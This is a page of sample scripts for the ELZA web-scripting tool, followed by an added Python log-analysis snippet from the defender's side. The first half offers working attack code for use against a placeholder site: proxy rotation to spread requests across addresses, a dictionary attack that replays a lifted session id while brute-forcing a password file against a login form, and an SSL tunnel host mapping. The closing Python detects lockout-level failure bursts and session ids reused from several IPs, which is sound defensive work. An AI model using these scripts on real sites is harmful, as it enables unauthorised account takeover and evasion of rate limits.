These are some samples of code that one may find useful:

1. PROXY ROTATION

# First, push values into PROXY and PORT. Each time we use one of
# those substs, the next available value is substituted.
subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com
subst PORT @ 3128 8080 80

# The BEFOREREQUEST proc is automatically executed before making
# a request to the remote server. This allows us to set a proxy server.
proc BEFOREREQUEST
# Push the next available values from PROXY and PORT into
# the respective system variables
var proxy = PROXY
var port = PORT
endproc BEFOREREQUEST

# And now we do the requests we want to do. Each of them is piped
# through a different proxy server.
get url http://www.victim.com/page1.html
get url http://www.victim.com/page2.html
get url http://www.victim.com/page3.html
get url http://www.victim.com/page4.html
get url http://www.victim.com/page5.html

In this example, page1.html is requested through proxy.domain1.com on port 3128, page2.html is requested through proxy.domain2.com:8080, and page3.html through proxy.domain3.com:80. page4.html is requested again through the first proxy, page5.html through the second, and so on. Cool, isn't it?

2. DICTIONARY ATTACK

This script serves as an example of how dictionary attacks work using ELZA. I guess many web site administrators are not THAT stupid after all. If they lock out an account after several wrong passwords, you can do nothing.

# First, we define the static things
subst ACCOUNT = bozo

# We request the actual login form so that we can examine it
get url http://www.victim.com/loginform.html

# Then, we grab the very important session_id hidden form field,
# so that we pass it along with each of our login attempts.
field session_id $

# Then, we save the form field value we just grabbed into a subst
# so that we can use it in the future.
subst SID f= session_id

# Next, we define a procedure to be executed if our attack is
# successful.
proc SUCCESS
print WOW! Login: ACCOUNT, Password: CURRPASS
endproc SUCCESS

# Then, we define the procedure that tries to break in
proc TRYPASSWORD
# All necessary fields should be set before the request,
# because they are cleared after each request.
field username = ACCOUNT
field password = CURRPASS
# We set the session_id form field value we hijacked from the
# legitimate login form.
field session_id = SID
# And we do a POST to the login script
post url http://www.victim.com/cgi-bin/login.cgi
# Next, we check if we were successful and if we are,
# we call the SUCCESS procedure.
call SUCCESS if body != Login failed!
endproc TRYPASSWORD

# And finally, we define the main loop that executes
# TRYPASSWORD for each password from our dictionary file (dict.txt)
call TRYPASSWORD CURRPASS % dict.txt

3. AVOIDING SPAWNING THE SSL TUNNEL REPEATEDLY

This should work as follows:

1. Spawn the tunnel before running the ELZA script.
2. In the ELZA script, do a hostmap for the host you want to connect to:

# Tell ELZA not to spawn a tunnel when encountering https://
var honorhttps = no

# Tell ELZA to pipe all requests to secure-server.victim.com
# on port 443 to localhost, port 24242
hostmap secure-server.victim.com 443 localhost 24242

That is all for now. If you have a piece of code you would like to be included, please pass it on to philip_stoev@iname.com.
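The dictionary attack in section 2 notes that it fails once the server locks an account after several wrong passwords, and the proxy rotation in section 1 spreads the same requests across several client addresses. The following Python snippet is an added example from the defender's side; it is not ELZA code and not part of the ELZA project. It parses a constructed login log (the log format, the IP addresses and the session ids are assumptions for illustration) and flags two traces those scripts leave: an account whose failures reach a lockout threshold within a time window, and a session id that keeps being presented from several client addresses, which is what a form token lifted once and replayed through rotating proxies looks like.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the page): timestamp, client IP,
# account, session id, outcome. Three addresses rotate while one account
# and one session id are reused, the pattern sections 1 and 2 produce.
SAMPLE_LOG = """\
2024-01-01T10:00:00 198.51.100.1 bozo sess-abc FAIL
2024-01-01T10:00:01 198.51.100.2 bozo sess-abc FAIL
2024-01-01T10:00:02 198.51.100.3 bozo sess-abc FAIL
2024-01-01T10:00:03 198.51.100.1 bozo sess-abc FAIL
2024-01-01T10:00:04 198.51.100.2 bozo sess-abc FAIL
2024-01-01T10:00:05 198.51.100.3 bozo sess-abc OK
2024-01-01T10:05:00 203.0.113.7 alice sess-xyz FAIL
2024-01-01T10:05:30 203.0.113.7 alice sess-xyz OK
"""


def parse_log(text):
    """Turn the assumed whitespace-separated format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, sid, outcome = line.split()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "ip": ip,
            "account": account,
            "sid": sid,
            "outcome": outcome,
        })
    return events


def failed_login_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Return {account: time} for accounts whose failures inside `window`
    reach `threshold`. A site with the lockout the page mentions would
    lock the account at exactly that moment, so the sixth attempt above
    (the one that 'succeeds') would have been refused."""
    flagged = {}
    recent = defaultdict(list)  # account -> timestamps of recent failures
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["outcome"] != "FAIL":
            continue
        q = recent[e["account"]]
        q.append(e["ts"])
        # Slide the window: discard failures older than `window`.
        while q and e["ts"] - q[0] > window:
            q.pop(0)
        if len(q) >= threshold and e["account"] not in flagged:
            flagged[e["account"]] = e["ts"]
    return flagged


def session_ip_spread(events, min_ips=3):
    """Return {session_id: sorted IPs} for sessions seen from at least
    `min_ips` client addresses. One browser rarely changes address
    several times within seconds; a replayed token behind rotating
    proxies does."""
    ips = defaultdict(set)
    for e in events:
        ips[e["sid"]].add(e["ip"])
    return {sid: sorted(s) for sid, s in ips.items() if len(s) >= min_ips}


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("lockout candidates:", failed_login_bursts(evs))
    print("session/IP spread:", session_ip_spread(evs))
```

Both checks are cheap enough to run over a web server's access or authentication log in a scheduled job; the threshold and window are the same knobs a lockout policy exposes, so tuning them for detection and for enforcement can be done together.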